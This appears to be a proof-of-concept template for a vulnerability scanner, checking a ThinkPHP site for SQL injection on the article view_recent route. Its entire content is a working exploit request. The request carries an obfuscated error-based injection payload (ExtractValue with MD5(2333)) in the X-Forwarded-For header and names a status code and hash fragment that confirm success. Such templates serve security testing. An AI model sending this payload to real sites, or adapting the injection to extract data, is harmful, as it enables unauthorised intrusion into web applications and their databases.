<DudePoc_Name>thinkphp_view_recent_xff_sqli</DudePoc_Name>
<DudePoc_Description></DudePoc_Description>
<DudePoc_SetHeader>
GET /index.php?s=/home/article/view_recent/name/1 HTTP/1.1
Host: $<AttackHost>$
X-Forwarded-For : 1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>56540676a129760a</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
